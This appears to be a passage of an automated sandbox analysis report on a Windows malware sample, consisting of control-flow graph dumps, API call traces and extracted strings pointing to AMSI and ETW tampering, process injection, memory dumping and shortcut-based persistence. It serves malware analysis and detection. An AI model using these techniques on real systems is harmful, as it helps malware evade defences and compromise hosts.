call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aaf094 call 2a94860 call 2a949a0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a97e5c 2806->2818 2872 2ab9d65-2ab9d6c call 2aa89d0 2807->2872 3238 2ab9818-2ab9aea call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae358 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94de0 * 2 call 2a94764 call 2aadc8c 2818->3238 3239 2ab9aef-2ab9ce4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949f8 2818->3239 2994 2ab887b-2ab887e 2835->2994 2995 2ab8880-2ab8ba0 call 2a949f8 call 2aade50 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aad164 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 2835->2995 2836->2835 2885 2ab9d71-2aba0cb call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 2872->2885 3427 2aba0d0-2aba0d7 call 2aa89d0 2885->3427 2994->2995 3524 2ab8bb9-2ab92c0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 ResumeThread call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 CloseHandle call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa8080 call 2aa894c * 6 CloseHandle 2995->3524 3525 2ab8ba2-2ab8bb4 call 2aa8730 2995->3525 3215->3216 3766 2ab8109-2ab8120 call 2a93700 3216->3766 3238->3239 3643 2ab9ce9-2ab9cf0 call 2aa8d70 3239->3643 3281->3282 3442 2aba0dc-2aba0fe call 2a946d4 * 2 3427->3442 3471 2aba103-2aba10a call 2aa89d0 3442->3471 3486 2aba10f-2aba131 call 2a946d4 * 2 3471->3486 3515 2aba136-2aba13d call 2aa89d0 3486->3515 3531 2aba142-2aba164 call 2a946d4 * 2 3515->3531 4215 2ab92c5-2ab939c call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 3524->4215 3525->3524 3556 2aba169-2aba170 call 2aa89d0 3531->3556 3571 2aba175-2aba197 call 2a946d4 * 2 3556->3571 3600 2aba19c-2aba1a3 call 2aa89d0 3571->3600 3615 2aba1a8-2aba213 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 3600->3615 3690 2aba218-2aba21f call 2aa89d0 3615->3690 3643->2807 3703 2aba224-2aba469 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 3690->3703 3931 2aba46e-2aba475 call 2aa89d0 3703->3931 3938 2aba47a-2aba49c call 2a946d4 * 2 3931->3938 3948 2aba4a1-2aba4a8 call 2aa89d0 3938->3948 3954 2aba4ad-2aba4cf call 2a946d4 * 2 3948->3954 3967 2aba4d4-2aba4db call 2aa89d0 3954->3967 3973 2aba4e0-2aba502 call 2a946d4 * 2 3967->3973 3986 2aba507-2aba50e call 2aa89d0 3973->3986 3992 2aba513-2aba9ad call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 * 5 3986->3992 4292 2aba9b2-2abaa07 call 2aa89d0 * 6 3992->4292 4215->2624 4304 2abaa0c-2abaa16 call 2aa89d0 4292->4304 4306 2abaa1b-2abaa43 call 2aa89d0 * 3 4304->4306 4312 2abaa48-2abadce call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 4306->4312 4416 2abadd3-2abadda call 2aa89d0 4312->4416 4418 2abaddf-2abae01 call 2a946d4 * 2 4416->4418 4422 2abae06-2abae0d call 2aa89d0 4418->4422 4424 2abae12-2abae34 call 2a946d4 * 2 4422->4424 4428 2abae39-2abae40 call 2aa89d0 4424->4428 4430 2abae45-2abb2f3 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2aa7c10 call 2aa8338 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 4428->4430 4572 2abb2f8-2abb2fa ExitProcess 4430->4572
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Module$AddressFileHandleNamePathProc$AttributesCheckCloseDebuggerFreeLibraryName_PresentRemote
                                                                                                                                • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                • API String ID: 3113829192-2693441831
                                                                                                                                • Opcode ID: f35ea61aa49307a361a49048da548da2bd57cab0795552531b30ba5c4e8e1869
                                                                                                                                • Instruction ID: 66d4dacf97785467353d8f106c1cd84f4057ef898fa5a08929eba8cb786c7f76
                                                                                                                                • Opcode Fuzzy Hash: f35ea61aa49307a361a49048da548da2bd57cab0795552531b30ba5c4e8e1869
                                                                                                                                • Instruction Fuzzy Hash: FA14F575A80118DFDF21EB65DE90ACE73FAFF89304F5044A69409AB614DE30AE92CF51

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 4573 2ab8122-2ab8517 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 4688 2ab851d-2ab86f0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a947ec call 2a949a0 call 2a94d74 call 2a94df0 CreateProcessAsUserW 4573->4688 4689 2ab93a1-2ab9524 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a948ec 4573->4689 4798 2ab876e-2ab8879 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 4688->4798 4799 2ab86f2-2ab8769 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 4688->4799 4779 2ab952a-2ab9539 call 2a948ec 4689->4779 4780 2ab9cf5-2abb2fa call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 * 16 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2a946d4 * 2 call 2aa89d0 call 2aa7c10 call 2aa8338 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 ExitProcess 4689->4780 4779->4780 4787 2ab953f-2ab9812 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aaf094 call 2a94860 call 2a949a0 call 2a946d4 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a97e5c 4779->4787 5045 2ab9818-2ab9aea call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aae358 call 2a94530 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94de0 * 2 call 2a94764 call 2aadc8c 4787->5045 5046 2ab9aef-2ab9cf0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a949f8 call 2aa8d70 4787->5046 4899 2ab887b-2ab887e 4798->4899 4900 2ab8880-2ab8ba0 call 2a949f8 call 2aade50 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aad164 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 4798->4900 4799->4798 4899->4900 5213 2ab8bb9-2ab939c call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 ResumeThread call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 CloseHandle call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2aa8080 call 2aa894c * 6 CloseHandle call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 call 2a94860 call 2a949a0 call 2a946d4 call 2a947ec call 2a949a0 call 2a946d4 call 2aa89d0 4900->5213 5214 2ab8ba2-2ab8bb4 call 2aa8730 4900->5214 5045->5046 5046->4780 5213->4689 5214->5213
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02AA89D0: FreeLibrary.KERNEL32(02B17388,00000000,00000000,00000000,00000000,02B1738C,Function_0000562C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,02B17388,00000000,00000000), ref: 02AA8AAA
                                                                                                                                • CreateProcessAsUserW.ADVAPI32(02C0B7DC,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C0B7E0,02C0B824,OpenSession,02B12F60,02ABB7B8,UacScan,02B12F60), ref: 02AB86E9
                                                                                                                                • ResumeThread.KERNEL32(02C0B828,ScanBuffer,02B12F60,02ABB7B8,OpenSession,02B12F60,02ABB7B8,UacScan,02B12F60,02ABB7B8,ScanBuffer,02B12F60,02ABB7B8,OpenSession,02B12F60,02ABB7B8), ref: 02AB8D33
                                                                                                                                • CloseHandle.KERNEL32(02C0B824,ScanBuffer,02B12F60,02ABB7B8,OpenSession,02B12F60,02ABB7B8,UacScan,02B12F60,02ABB7B8,02C0B828,ScanBuffer,02B12F60,02ABB7B8,OpenSession,02B12F60), ref: 02AB8EB2
                                                                                                                                  • Part of subcall function 02AA894C: LoadLibraryW.KERNEL32(?,?), ref: 02AA8960
                                                                                                                                  • Part of subcall function 02AA894C: GetProcAddress.KERNEL32(02B17394,BCryptVerifySignature), ref: 02AA897A
                                                                                                                                  • Part of subcall function 02AA894C: FreeLibrary.KERNEL32(02B17394,02B17394,BCryptVerifySignature,bcrypt,?,02B173D4,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize), ref: 02AA89B6
                                                                                                                                • CloseHandle.KERNEL32(02C0B824,02C0B824,ScanBuffer,02B12F60,02ABB7B8,UacInitialize,02B12F60,02ABB7B8,ScanBuffer,02B12F60,02ABB7B8,OpenSession,02B12F60,02ABB7B8,UacScan,02B12F60), ref: 02AB92A4
                                                                                                                                  • Part of subcall function 02AADC8C: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02AADCCB
                                                                                                                                  • Part of subcall function 02AADC8C: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02AADD32
                                                                                                                                  • Part of subcall function 02AADC8C: NtClose.NTDLL(?), ref: 02AADD3B
                                                                                                                                  • Part of subcall function 02AA8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02AA83C2), ref: 02AA83A4
                                                                                                                                • ExitProcess.KERNEL32(00000000,OpenSession,02B12F60,02ABB7B8,ScanBuffer,02B12F60,02ABB7B8,Initialize,02B12F60,02ABB7B8,00000000,00000000,00000000,ScanString,02B12F60,02ABB7B8), ref: 02ABB2FA
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseLibrary$FreeHandlePathProcess$AddressCacheCreateExitFileFlushInstructionLoadNameName_ProcResumeThreadUserWrite
